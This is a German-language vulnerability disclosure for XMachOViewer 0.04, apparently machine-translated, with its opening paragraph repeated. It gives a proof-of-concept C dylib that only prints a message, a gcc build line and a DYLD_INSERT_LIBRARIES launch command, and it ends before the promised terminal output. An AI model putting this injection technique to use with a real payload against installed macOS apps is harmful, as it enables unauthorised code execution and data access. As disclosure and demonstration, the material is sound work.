
Eine Sicherheitslücke bei der dylib-Injektion in XMachOViewer 0.04 ermöglicht es Angreifern, die Integrität zu gefährden. Durch deren Ausnutzung kann nicht autorisierter Code in die Prozesse des Produkts injiziert werden, was möglicherweise zu Fernsteuerung und unbefugtem Zugriff auf sensible Benutzerdaten führt.
Eine Dylib-Injection-Sicherheitslücke in XMachOViewer 0.04 ermöglicht es Angreifern, die Integrität zu gefährden. Durch Ausnutzung dieser Schwachstelle kann nicht autorisierter Code in die Prozesse des Produkts eingeschleust werden, was potenziell zu Fernsteuerung und unbefugtem Zugriff auf sensible Benutzerdaten führen kann.

Tragbare Version für macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Kompilieren
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
Und injizieren:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Dies öffnet die Anwendung und führt das Dylib aus. Nach dem Schließen der Anwendung sehen wir es im Terminal:
